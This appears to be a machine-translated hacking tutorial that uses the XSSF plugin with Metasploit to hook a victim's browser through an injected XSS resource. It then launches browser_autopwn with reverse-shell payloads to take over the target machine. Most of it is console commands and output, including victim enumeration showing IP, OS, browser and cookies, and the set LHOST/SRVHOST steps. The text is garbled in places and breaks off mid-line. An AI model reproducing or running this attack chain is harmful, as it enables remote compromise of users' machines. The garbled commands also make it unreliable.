TEST How xss obtains SYSTEM privileges of the target machine

Author: RootkitHat. Org
Suspected of installing B, but how do you know what system and browser your target uses?
A similar tool here has a: http://xss-proxy.sourceforge.net
Attachment: Parh, sploits, 2011/06, and XSSF.zip
After decompression, copy all the attachments to/msf3 /.
Start metasploit, create a database, and load the plug-in

O 8 o
8 8 8
OoYoYo... oPYo. o8P. oPYo... oPYo. 8. oPYo. o8 o8P
8 8 8 8 oooo8 8. oooo8 Yb .. 8 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 Yb. 8 8 8 8 8 8
8 8 8 'ooo 8 'yoop8' YooP 8 YooP 8 'yoop 8 8
.. :.. :.. :..... :::.. ::..... ::.....: 8 ..... :.. :..... ::.. ::..:
::::: ::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::

= [Metasploit v3.5.1-dev [core: 3.5 api: 1.0]
+ -- = [635 exploits-335 auxiliary
+ -- = [215 payloads-27 encoders-8 nops
= [Svn r11089 updated 239 days ago (2010.11.22)

Warning: This copy of the Metasploit Framework was last updated 239 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:

Http://www.metasploit.com/redmine/projects/framework/wiki/Updating

Msf> db_disconnect
Msf> db_driver mysql
Msf> db_connect root: toor@127.0.0.1/xssftest
Msf> load xssf

______________________
/\_\_\_/___/___/___
/_/\_/_\___\_____
/\_/\_/\_____/\_____\_
/_/_____/_/Cross-Site Scripting Framework
Ludovic Courgnaud-CONIX Security

[+] Server started: http: // 192.168.56.101: 8888/

[*] Please, inject http: // 192.168.56.101: 8888/loop resource in an XSS
[*] Successfully loaded plugin: XSSF if the IP address is not your Internet IP address, change/opt/metasploit3/msf3/plugins/xssf. rb to your Internet IP Address
Then let the target machine xss "http: // 192.168.56.101: 8888/loop"

 

View xss sessions

Msf> xssf_victims

Victims
========

Id xssf_server_id active ip interval browser_name browser_version cookie
-----------------------------------------------------------------
1 1 true 192.168.56.1 2 Internet Explorer 6.0 YES

[*] Use xssf_information [VictimID] to see more information about a victimtrue indicates that you can Use

Link an xss session

Msf> xssf_information 1

Information about victim 1
======================================
Ip address: 192.168.56.1
ACTIVE: TRUE
First request: Tue Jul 19 23:30:25 UTC 2011
Last request: Tue Jul 19 23:31:17 UTC 2011
Connection time: 52.0 seconds
Browser name: Internet Explorer
Browsers VERSION: 6.0
OS NAME: Windows
OS VERSION: XP
ARCHITECTURE: ARCH_X86
LOCATION: file: // C:/Documents and Settings/dis9team/Documents/xss.htm
COOKIES? : YES
How to obtain system permissions for running attack: NONE:

Use the METASPLOIT module to automatically create some browser vulnerabilities. Note that the port cannot be the same as the xssf plug-in port.

Msf> use auxiliary/server/browser_autopwn
Msf auxiliary (browser_autopwn)> show options

Module options:

Name Current Setting Required Description
--------------------------------------
LHOST yes The IP address to use for reverse-connect payloads
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that shoshould be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)

Msf auxiliary (browser_autopwn)> set LHOST 192.168.56.101
LHOST => 192.168.56.101
Msf auxiliary (browser_autopwn)> set SRVHOST 192.168.56.101
SRVHOST => 192.168.56.101
Msf auxiliary (browser_autopwn)> set SRVPORT 8081
SRVPORT => 8081
Msf auxiliary (browser_autopwn)> exploit
Msf auxiliary (browser_autopwn)> exploit
[*] Auxiliary module execution completed

[*] Starting exploit modules on host 192.168.56.101...
[*] ---

[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http: // 192.168.56.101: 8081/QlQp2UFx8EADO
[*] Server started.
Msf auxiliary (browser_autopwn)> [*] Starting exploit multi/browser/java_cale